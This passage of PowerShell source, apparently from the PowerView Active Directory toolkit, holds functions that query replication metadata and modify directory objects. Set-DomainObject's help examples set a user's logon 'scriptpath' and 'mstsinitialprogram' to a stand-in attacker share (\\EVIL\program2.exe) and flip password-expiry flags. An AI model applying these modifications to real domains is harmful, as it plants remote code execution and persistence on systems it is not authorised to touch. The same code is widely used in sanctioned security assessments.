if ($_ -match 'NOT_.*') {
$UACField = $_.Substring(4)
$UACValue = [Int]($UACEnum::$UACField)
$Filter += "(!(userAccountControl:1.2.840.113556.1.4.803:=$UACValue))"
}
else {
$UACValue = [Int]($UACEnum::$_)
$Filter += "(userAccountControl:1.2.840.113556.1.4.803:=$UACValue)"
}
}
if ($Filter -and $Filter -ne '') {
$ObjectSearcher.filter = "(&$Filter)"
}
Write-Verbose "[Get-DomainObject] Get-DomainObject filter string: $($ObjectSearcher.filter)"
if ($PSBoundParameters['FindOne']) { $Results = $ObjectSearcher.FindOne() }
else { $Results = $ObjectSearcher.FindAll() }
$Results | Where-Object {$_} | ForEach-Object {
if ($PSBoundParameters['Raw']) {
# return raw result objects
$Object = $_
$Object.PSObject.TypeNames.Insert(0, 'PowerView.ADObject.Raw')
}
else {
$Object = Convert-LDAPProperty -Properties $_.Properties
$Object.PSObject.TypeNames.Insert(0, 'PowerView.ADObject')
}
$Object
}
if ($Results) {
try { $Results.dispose() }
catch {
Write-Verbose "[Get-DomainObject] Error disposing of the Results object: $_"
}
}
$ObjectSearcher.dispose()
}
}
}
function Get-DomainObjectAttributeHistory {
<#
.SYNOPSIS
Returns the Active Directory attribute replication metadata for the specified
object, i.e. a parsed version of the msds-replattributemetadata attribute.
By default, replication data for every domain object is returned.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Get-DomainObject
.DESCRIPTION
Wraps Get-DomainObject with a specification to retrieve the property 'msds-replattributemetadata'.
This is the domain attribute replication metadata associated with the object. The results are
parsed from their XML string form and returned as a custom object.
.PARAMETER Identity
A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).
Wildcards accepted.
.PARAMETER Domain
Specifies the domain to use for the query, defaults to the current domain.
.PARAMETER LDAPFilter
Specifies an LDAP query string that is used to filter Active Directory objects.
.PARAMETER Properties
Only return replication metadata on the specified property names.
.PARAMETER SearchBase
The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
Useful for OU queries.
.PARAMETER Server
Specifies an Active Directory server (domain controller) to bind to.
.PARAMETER SearchScope
Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
.PARAMETER ResultPageSize
Specifies the PageSize to set for the LDAP searcher object.
.PARAMETER ServerTimeLimit
Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
.PARAMETER Tombstone
Switch. Specifies that the searcher should also return deleted/tombstoned objects.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain.
.EXAMPLE
Get-DomainObjectAttributeHistory -Domain testlab.local
Return all attribute replication metadata for all objects in the testlab.local domain.
.EXAMPLE
'S-1-5-21-883232822-274137685-4173207997-1109','CN=dfm.a,CN=Users,DC=testlab,DC=local','da','94299db1-e3e7-48f9-845b-3bffef8bedbb' | Get-DomainObjectAttributeHistory -Properties objectClass | ft
ObjectDN ObjectGuid AttributeNam LastOriginat Version LastOriginat
e ingChange ingDsaDN
-------- ---------- ------------ ------------ ------- ------------
CN=dfm.a,C... a6263874-f... objectClass 2017-03-0... 1 CN=NTDS S...
CN=DA,CN=U... 77b56df4-f... objectClass 2017-04-1... 1 CN=NTDS S...
CN=harmj0y... 94299db1-e... objectClass 2017-03-0... 1 CN=NTDS S...
.EXAMPLE
Get-DomainObjectAttributeHistory harmj0y -Properties userAccountControl
ObjectDN : CN=harmj0y,CN=Users,DC=testlab,DC=local
ObjectGuid : 94299db1-e3e7-48f9-845b-3bffef8bedbb
AttributeName : userAccountControl
LastOriginatingChange : 2017-03-07T19:56:27Z
Version : 4
LastOriginatingDsaDN : CN=NTDS Settings,CN=PRIMARY,CN=Servers,CN=Default-First
-Site-Name,CN=Sites,CN=Configuration,DC=testlab,DC=loca
l
.OUTPUTS
PowerView.ADObjectAttributeHistory
Custom PSObject with translated replication metadata fields.
.LINK
https://blogs.technet.microsoft.com/pie/2014/08/25/metadata-1-when-did-the-delegation-change-how-to-track-security-descriptor-modifications/
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]
[OutputType('PowerView.ADObjectAttributeHistory')]
[CmdletBinding()]
Param(
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')]
[String[]]
$Identity,
[ValidateNotNullOrEmpty()]
[String]
$Domain,
[ValidateNotNullOrEmpty()]
[Alias('Filter')]
[String]
$LDAPFilter,
[ValidateNotNullOrEmpty()]
[String[]]
$Properties,
[ValidateNotNullOrEmpty()]
[Alias('ADSPath')]
[String]
$SearchBase,
[ValidateNotNullOrEmpty()]
[Alias('DomainController')]
[String]
$Server,
[ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
$SearchScope = 'Subtree',
[ValidateRange(1, 10000)]
[Int]
$ResultPageSize = 200,
[ValidateRange(1, 10000)]
[Int]
$ServerTimeLimit,
[Switch]
$Tombstone,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty,
[Switch]
$Raw
)
BEGIN {
$SearcherArguments = @{
'Properties' = 'msds-replattributemetadata','distinguishedname'
'Raw' = $True
}
if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $LDAPFilter }
if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
if ($PSBoundParameters['FindOne']) { $SearcherArguments['FindOne'] = $FindOne }
if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
if ($PSBoundParameters['Properties']) {
$PropertyFilter = $PSBoundParameters['Properties'] -Join '|'
}
else {
$PropertyFilter = ''
}
}
PROCESS {
if ($PSBoundParameters['Identity']) { $SearcherArguments['Identity'] = $Identity }
Get-DomainObject @SearcherArguments | ForEach-Object {
$ObjectDN = $_.Properties['distinguishedname'][0]
ForEach($XMLNode in $_.Properties['msds-replattributemetadata']) {
$TempObject = [xml]$XMLNode | Select-Object -ExpandProperty 'DS_REPL_ATTR_META_DATA' -ErrorAction SilentlyContinue
if ($TempObject) {
if ($TempObject.pszAttributeName -Match $PropertyFilter) {
$Output = New-Object PSObject
$Output | Add-Member NoteProperty 'ObjectDN' $ObjectDN
$Output | Add-Member NoteProperty 'AttributeName' $TempObject.pszAttributeName
$Output | Add-Member NoteProperty 'LastOriginatingChange' $TempObject.ftimeLastOriginatingChange
$Output | Add-Member NoteProperty 'Version' $TempObject.dwVersion
$Output | Add-Member NoteProperty 'LastOriginatingDsaDN' $TempObject.pszLastOriginatingDsaDN
$Output.PSObject.TypeNames.Insert(0, 'PowerView.ADObjectAttributeHistory')
$Output
}
}
else {
Write-Verbose "[Get-DomainObjectAttributeHistory] Error retrieving 'msds-replattributemetadata' for '$ObjectDN'"
}
}
}
}
}
function Get-DomainObjectLinkedAttributeHistory {
<#
.SYNOPSIS
Returns the Active Directory links attribute value replication metadata for the
specified object, i.e. a parsed version of the msds-replvaluemetadata attribute.
By default, replication data for every domain object is returned.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Get-DomainObject
.DESCRIPTION
Wraps Get-DomainObject with a specification to retrieve the property 'msds-replvaluemetadata'.
This is the domain linked attribute value replication metadata associated with the object. The
results are parsed from their XML string form and returned as a custom object.
.PARAMETER Identity
A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).
Wildcards accepted.
.PARAMETER Domain
Specifies the domain to use for the query, defaults to the current domain.
.PARAMETER LDAPFilter
Specifies an LDAP query string that is used to filter Active Directory objects.
.PARAMETER Properties
Only return replication metadata on the specified property names.
.PARAMETER SearchBase
The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
Useful for OU queries.
.PARAMETER Server
Specifies an Active Directory server (domain controller) to bind to.
.PARAMETER SearchScope
Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
.PARAMETER ResultPageSize
Specifies the PageSize to set for the LDAP searcher object.
.PARAMETER ServerTimeLimit
Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
.PARAMETER Tombstone
Switch. Specifies that the searcher should also return deleted/tombstoned objects.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain.
.EXAMPLE
Get-DomainObjectLinkedAttributeHistory | Group-Object ObjectDN | ft -a
Count Name
----- ----
4 CN=Administrators,CN=Builtin,DC=testlab,DC=local
4 CN=Users,CN=Builtin,DC=testlab,DC=local
2 CN=Guests,CN=Builtin,DC=testlab,DC=local
1 CN=IIS_IUSRS,CN=Builtin,DC=testlab,DC=local
1 CN=Schema Admins,CN=Users,DC=testlab,DC=local
1 CN=Enterprise Admins,CN=Users,DC=testlab,DC=local
4 CN=Domain Admins,CN=Users,DC=testlab,DC=local
1 CN=Group Policy Creator Owners,CN=Users,DC=testlab,DC=local
1 CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=testlab,DC=local
1 CN=Windows Authorization Access Group,CN=Builtin,DC=testlab,DC=local
8 CN=Denied RODC Password Replication Group,CN=Users,DC=testlab,DC=local
2 CN=PRIMARY,CN=Topology,CN=Domain System Volume,CN=DFSR-GlobalSettings,...
1 CN=Domain System Volume,CN=DFSR-LocalSettings,CN=PRIMARY,OU=Domain Con...
1 CN=ServerAdmins,CN=Users,DC=testlab,DC=local
3 CN=DomainLocalGroup,CN=Users,DC=testlab,DC=local
.EXAMPLE
'S-1-5-21-883232822-274137685-4173207997-519','af94f49e-61a5-4f7d-a17c-d80fb16a5220' | Get-DomainObjectLinkedAttributeHistory
ObjectDN : CN=Enterprise Admins,CN=Users,DC=testlab,DC=local
ObjectGuid : 94e782c1-16a1-400b-a7d0-1126038c6387
AttributeName : member
AttributeValue : CN=Administrator,CN=Users,DC=testlab,DC=local
TimeDeleted : 2017-03-06T00:48:29Z
TimeCreated : 2017-03-06T00:48:29Z
LastOriginatingChange : 2017-03-06T00:48:29Z
Version : 1
LastOriginatingDsaDN : CN=NTDS Settings,CN=PRIMARY,CN=Servers,CN=Default-First
-Site-Name,CN=Sites,CN=Configuration,DC=testlab,DC=loca
l
ObjectDN : CN=Domain Admins,CN=Users,DC=testlab,DC=local
ObjectGuid : af94f49e-61a5-4f7d-a17c-d80fb16a5220
AttributeName : member
AttributeValue : CN=dfm,CN=Users,DC=testlab,DC=local
TimeDeleted : 2017-06-13T22:20:02Z
TimeCreated : 2017-06-13T22:20:02Z
LastOriginatingChange : 2017-06-13T22:20:22Z
Version : 2
LastOriginatingDsaDN : CN=NTDS Settings,CN=PRIMARY,CN=Servers,CN=Default-First
-Site-Name,CN=Sites,CN=Configuration,DC=testlab,DC=loca
l
ObjectDN : CN=Domain Admins,CN=Users,DC=testlab,DC=local
ObjectGuid : af94f49e-61a5-4f7d-a17c-d80fb16a5220
AttributeName : member
AttributeValue : CN=Administrator,CN=Users,DC=testlab,DC=local
TimeDeleted : 2017-03-06T00:48:29Z
TimeCreated : 2017-03-06T00:48:29Z
LastOriginatingChange : 2017-03-06T00:48:29Z
Version : 1
LastOriginatingDsaDN : CN=NTDS Settings,CN=PRIMARY,CN=Servers,CN=Default-First
-Site-Name,CN=Sites,CN=Configuration,DC=testlab,DC=loca
l
.EXAMPLE
Get-DomainObjectLinkedAttributeHistory ServerAdmins -Domain testlab.local
ObjectDN : CN=ServerAdmins,CN=Users,DC=testlab,DC=local
ObjectGuid : 603b46ad-555c-49b3-8745-c0718febefc2
AttributeName : member
AttributeValue : CN=jason.a,CN=Users,DC=dev,DC=testlab,DC=local
TimeDeleted : 2017-04-10T22:17:19Z
TimeCreated : 2017-04-10T22:17:19Z
LastOriginatingChange : 2017-04-10T22:17:19Z
Version : 1
LastOriginatingDsaDN : CN=NTDS Settings,CN=PRIMARY,CN=Servers,CN=Default-First
-Site-Name,CN=Sites,CN=Configuration,DC=testlab,DC=loca
l
.OUTPUTS
PowerView.ADObjectLinkedAttributeHistory
Custom PSObject with translated replication metadata fields.
.LINK
https://blogs.technet.microsoft.com/pie/2014/08/25/metadata-2-the-ephemeral-admin-or-how-to-track-the-group-membership/
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]
[OutputType('PowerView.ADObjectLinkedAttributeHistory')]
[CmdletBinding()]
Param(
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')]
[String[]]
$Identity,
[ValidateNotNullOrEmpty()]
[String]
$Domain,
[ValidateNotNullOrEmpty()]
[Alias('Filter')]
[String]
$LDAPFilter,
[ValidateNotNullOrEmpty()]
[String[]]
$Properties,
[ValidateNotNullOrEmpty()]
[Alias('ADSPath')]
[String]
$SearchBase,
[ValidateNotNullOrEmpty()]
[Alias('DomainController')]
[String]
$Server,
[ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
$SearchScope = 'Subtree',
[ValidateRange(1, 10000)]
[Int]
$ResultPageSize = 200,
[ValidateRange(1, 10000)]
[Int]
$ServerTimeLimit,
[Switch]
$Tombstone,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty,
[Switch]
$Raw
)
BEGIN {
$SearcherArguments = @{
'Properties' = 'msds-replvaluemetadata','distinguishedname'
'Raw' = $True
}
if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $LDAPFilter }
if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
if ($PSBoundParameters['Properties']) {
$PropertyFilter = $PSBoundParameters['Properties'] -Join '|'
}
else {
$PropertyFilter = ''
}
}
PROCESS {
if ($PSBoundParameters['Identity']) { $SearcherArguments['Identity'] = $Identity }
Get-DomainObject @SearcherArguments | ForEach-Object {
$ObjectDN = $_.Properties['distinguishedname'][0]
ForEach($XMLNode in $_.Properties['msds-replvaluemetadata']) {
$TempObject = [xml]$XMLNode | Select-Object -ExpandProperty 'DS_REPL_VALUE_META_DATA' -ErrorAction SilentlyContinue
if ($TempObject) {
if ($TempObject.pszAttributeName -Match $PropertyFilter) {
$Output = New-Object PSObject
$Output | Add-Member NoteProperty 'ObjectDN' $ObjectDN
$Output | Add-Member NoteProperty 'AttributeName' $TempObject.pszAttributeName
$Output | Add-Member NoteProperty 'AttributeValue' $TempObject.pszObjectDn
$Output | Add-Member NoteProperty 'TimeCreated' $TempObject.ftimeCreated
$Output | Add-Member NoteProperty 'TimeDeleted' $TempObject.ftimeDeleted
$Output | Add-Member NoteProperty 'LastOriginatingChange' $TempObject.ftimeLastOriginatingChange
$Output | Add-Member NoteProperty 'Version' $TempObject.dwVersion
$Output | Add-Member NoteProperty 'LastOriginatingDsaDN' $TempObject.pszLastOriginatingDsaDN
$Output.PSObject.TypeNames.Insert(0, 'PowerView.ADObjectLinkedAttributeHistory')
$Output
}
}
else {
Write-Verbose "[Get-DomainObjectLinkedAttributeHistory] Error retrieving 'msds-replvaluemetadata' for '$ObjectDN'"
}
}
}
}
}
function Set-DomainObject {
<#
.SYNOPSIS
Modifies a gven property for a specified active directory object.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Get-DomainObject
.DESCRIPTION
Splats user/object targeting parameters to Get-DomainObject, returning the raw
searchresult object. Retrieves the raw directoryentry for the object, and sets
any values from -Set @{}, XORs any values from -XOR @{}, and clears any values
from -Clear @().
.PARAMETER Identity
A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201).
Wildcards accepted.
.PARAMETER Set
Specifies values for one or more object properties (in the form of a hashtable) that will replace the current values.
.PARAMETER XOR
Specifies values for one or more object properties (in the form of a hashtable) that will XOR the current values.
.PARAMETER Clear
Specifies an array of object properties that will be cleared in the directory.
.PARAMETER Domain
Specifies the domain to use for the query, defaults to the current domain.
.PARAMETER LDAPFilter
Specifies an LDAP query string that is used to filter Active Directory objects.
.PARAMETER SearchBase
The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
Useful for OU queries.
.PARAMETER Server
Specifies an Active Directory server (domain controller) to bind to.
.PARAMETER SearchScope
Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
.PARAMETER ResultPageSize
Specifies the PageSize to set for the LDAP searcher object.
.PARAMETER ServerTimeLimit
Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
.PARAMETER Tombstone
Switch. Specifies that the searcher should also return deleted/tombstoned objects.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain.
.EXAMPLE
Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose
VERBOSE: Get-DomainSearcher search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
VERBOSE: Get-DomainObject filter string: (&(|(samAccountName=testuser)))
VERBOSE: Setting mstsinitialprogram to \\EVIL\program.exe for object testuser
.EXAMPLE
"S-1-5-21-890171859-3433809279-3366196753-1108","testuser" | Set-DomainObject -Set @{'countrycode'=1234; 'mstsinitialprogram'='\\EVIL\program2.exe'} -Verbose
VERBOSE: Get-DomainSearcher search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
VERBOSE: Get-DomainObject filter string:
(&(|(objectsid=S-1-5-21-890171859-3433809279-3366196753-1108)))
VERBOSE: Setting mstsinitialprogram to \\EVIL\program2.exe for object harmj0y
VERBOSE: Setting countrycode to 1234 for object harmj0y
VERBOSE: Get-DomainSearcher search string:
LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
VERBOSE: Get-DomainObject filter string: (&(|(samAccountName=testuser)))
VERBOSE: Setting mstsinitialprogram to \\EVIL\program2.exe for object testuser
VERBOSE: Setting countrycode to 1234 for object testuser
.EXAMPLE
"S-1-5-21-890171859-3433809279-3366196753-1108","testuser" | Set-DomainObject -Clear department -Verbose
Cleares the 'department' field for both object identities.
.EXAMPLE
Get-DomainUser testuser | ConvertFrom-UACValue -Verbose
Name Value
---- -----
NORMAL_ACCOUNT 512
Set-DomainObject -Identity testuser -XOR @{useraccountcontrol=65536} -Verbose
VERBOSE: Get-DomainSearcher search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
VERBOSE: Get-DomainObject filter string: (&(|(samAccountName=testuser)))
VERBOSE: XORing 'useraccountcontrol' with '65536' for object 'testuser'
Get-DomainUser testuser | ConvertFrom-UACValue -Verbose
Name Value
---- -----
NORMAL_ACCOUNT 512
DONT_EXPIRE_PASSWORD 65536
.EXAMPLE
Get-DomainUser -Identity testuser -Properties scriptpath
scriptpath
----------
\\primary\sysvol\blah.ps1
$SecPassword = ConvertTo-SecureString 'Password123!'-AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Set-DomainObject -Identity testuser -Set @{'scriptpath'='\\EVIL\program2.exe'} -Credential $Cred -Verbose
VERBOSE: [Get-Domain] Using alternate credentials for Get-Domain
VERBOSE: [Get-Domain] Extracted domain 'TESTLAB' from -Credential
VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local
VERBOSE: [Get-DomainSearcher] Using alternate credentials for LDAP connection
VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=testuser)(name=testuser))))
VERBOSE: [Set-DomainObject] Setting 'scriptpath' to '\\EVIL\program2.exe' for object 'testuser'
Get-DomainUser -Identity testuser -Properties scriptpath
scriptpath
----------
\\EVIL\program2.exe
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')]
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[CmdletBinding()]
Param(
[Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('DistinguishedName', 'SamAccountName', 'Name')]
[String[]]
$Identity,
[ValidateNotNullOrEmpty()]
[Alias('Replace')]
[Hashtable]
$Set,
[ValidateNotNullOrEmpty()]
[Hashtable]
$XOR,
[ValidateNotNullOrEmpty()]
[String[]]
$Clear,
[ValidateNotNullOrEmpty()]
[String]
$Domain,
[ValidateNotNullOrEmpty()]
[Alias('Filter')]
[String]
$LDAPFilter,
[ValidateNotNullOrEmpty()]
[Alias('ADSPath')]
[String]
$SearchBase,
[ValidateNotNullOrEmpty()]
[Alias('DomainController')]
[String]
$Server,
[ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
$SearchScope = 'Subtree',
[ValidateRange(1, 10000)]
[Int]
$ResultPageSize = 200,
[ValidateRange(1, 10000)]
[Int]
$ServerTimeLimit,
[Switch]
$Tombstone,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
BEGIN {
$SearcherArguments = @{'Raw' = $True}
if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $LDAPFilter }
if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
}
PROCESS {
if ($PSBoundParameters['Identity']) { $SearcherArguments['Identity'] = $Identity }
# splat the appropriate arguments to Get-DomainObject
$RawObject = Get-DomainObject @SearcherArguments
ForEach ($Object in $RawObject) {
$Entry = $RawObject.GetDirectoryEntry()
if($PSBoundParameters['Set']) {
try {
$PSBoundParameters['Set'].GetEnumerator() | ForEach-Object {
Write-Verbose "[Set-DomainObject] Setting '$($_.Name)' to '$($_.Value)' for object '$($RawObject.Properties.samaccountname)'"
$Entry.put($_.Name, $_.Value)
}
$Entry.commitchanges()
}
catch {
Write-Warning "[Set-DomainObject] Error setting/replacing properties for object '$($RawObject.Properties.samaccountname)' : $_"
}
}
if($PSBoundParameters['XOR']) {
try {
$PSBoundParameters['XOR'].GetEnumerator() | ForEach-Object {
$PropertyName = $_.Name
$PropertyXorValue = $_.Value
Write-Verbose "[Set-DomainObject] XORing '$PropertyName' with '$PropertyXorValue' for object '$($RawObject.Properties.samaccountname)'"
$TypeName = $Entry.$PropertyName[0].GetType().name
# UAC value references- https://support.microsoft.com/en-us/kb/305144
$PropertyValue = $($Entry.$PropertyName) -bxor $PropertyXorValue
$Entry.$PropertyName = $PropertyValue -as $TypeName
}
$Entry.commitchanges()
}
catch {
Write-Warning "[Set-DomainObject] Error XOR'ing properties for object '$($RawObject.Properties.samaccountname)' : $_"
}
}
if($PSBoundParameters['Clear']) {
try {
$PSBoundParameters['Clear'] | ForEach-Object {
$PropertyName = $_
Write-Verbose "[Set-DomainObject] Clearing '$PropertyName' for object '$($RawObject.Properties.samaccountname)'"
$Entry.$PropertyName.clear()
}
$Entry.commitchanges()
}
catch {
Write-Warning "[Set-DomainObject] Error clearing properties for object '$($RawObject.Properties.samaccountname)' : $_"
}
}
}
}
}
function ConvertFrom-LDAPLogonHours {
<#
.SYNOPSIS
Converts the LDAP LogonHours array to a processible object.
Author: Lee Christensen (@tifkin_)
License: BSD 3-Clause
Required Dependencies: None
.DESCRIPTION
Converts the LDAP LogonHours array to a processible object. Each entry
property in the output object corresponds to a day of the week and hour during
the day (in UTC) indicating whether or not the user can logon at the specified
hour.
.PARAMETER LogonHoursArray
21-byte LDAP hours array.
.EXAMPLE
$hours = (Get-DomainUser -LDAPFilter 'userworkstations=*')[0].logonhours
ConvertFrom-LDAPLogonHours $hours
Gets the logonhours array from the first AD user with logon restrictions.
.OUTPUTS
PowerView.LogonHours
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType('PowerView.LogonHours')]
[CmdletBinding()]
Param (
[Parameter( ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[ValidateNotNullOrEmpty()]
[byte[]]
$LogonHoursArray
)
Begin {
if($LogonHoursArray.Count -ne 21) {
throw "LogonHoursArray is the incorrect length"
}
function ConvertTo-LogonHoursArray {
Param (
[int[]]
$HoursArr
)
$LogonHours = New-Object bool[] 24
for($i=0; $i -lt 3; $i++) {
$Byte = $HoursArr[$i]
$Offset = $i * 8
$Str = [Convert]::ToString($Byte,2).PadLeft(8,'0')
$LogonHours[$Offset+0] = [bool] [convert]::ToInt32([string]$Str[7])
$LogonHours[$Offset+1] = [bool] [convert]::ToInt32([string]$Str[6])
$LogonHours[$Offset+2] = [bool] [convert]::ToInt32([string]$Str[5])
$LogonHours[$Offset+3] = [bool] [convert]::ToInt32([string]$Str[4])
$LogonHours[$Offset+4] = [bool] [convert]::ToInt32([string]$Str[3])
$LogonHours[$Offset+5] = [bool] [convert]::ToInt32([string]$Str[2])
$LogonHours[$Offset+6] = [bool] [convert]::ToInt32([string]$Str[1])
$LogonHours[$Offset+7] = [bool] [convert]::ToInt32([string]$Str[0])
}
$LogonHours
}
}
Process {
$Output = @{
Sunday = ConvertTo-LogonHoursArray -HoursArr $LogonHoursArray[0..2]
Monday = ConvertTo-LogonHoursArray -HoursArr $LogonHoursArray[3..5]
Tuesday = ConvertTo-LogonHoursArray -HoursArr $LogonHoursArray[6..8]
Wednesday = ConvertTo-LogonHoursArray -HoursArr $LogonHoursArray[9..11]
Thurs = ConvertTo-LogonHoursArray -HoursArr $LogonHoursArray[12..14]
Friday = ConvertTo-LogonHoursArray -HoursArr $LogonHoursArray[15..17]
Saturday = ConvertTo-LogonHoursArray -HoursArr $LogonHoursArray[18..20]
}
$Output = New-Object PSObject -Property $Output
$Output.PSObject.TypeNames.Insert(0, 'PowerView.LogonHours')
$Output
}
}
function New-ADObjectAccessControlEntry {
<#
.SYNOPSIS
Creates a new Active Directory object-specific access control entry.
Author: Lee Christensen (@tifkin_)
License: BSD 3-Clause
Required Dependencies: None
.DESCRIPTION
Creates a new object-specific access control entry (ACE). The ACE could be
used for auditing access to an object or controlling access to objects.
.PARAMETER PrincipalIdentity
A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local),
SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)
for the domain principal to add for the ACL. Required. Wildcards accepted.
.PARAMETER PrincipalDomain
Specifies the domain for the TargetIdentity to use for the principal, defaults to the current domain.
.PARAMETER PrincipalSearchBase
The LDAP source to search through for principals, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
Useful for OU queries.
.PARAMETER Server
Specifies an Active Directory server (domain controller) to bind to.
.PARAMETER SearchScope
Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
.PARAMETER ResultPageSize
Specifies the PageSize to set for the LDAP searcher object.
.PARAMETER ServerTimeLimit
Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
.PARAMETER Tombstone
Switch. Specifies that the searcher should also return deleted/tombstoned objects.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain.
.PARAMETER Right
Specifies the rights set on the Active Directory object.
.PARAMETER AccessControlType
Specifies the type of ACE (allow or deny)
.PARAMETER AuditFlag
For audit ACEs, specifies when to create an audit log (on success or failure)
.PARAMETER ObjectType
Specifies the GUID of the object that the ACE applies to.
.PARAMETER InheritanceType
Specifies how the ACE applies to the object and/or its children.
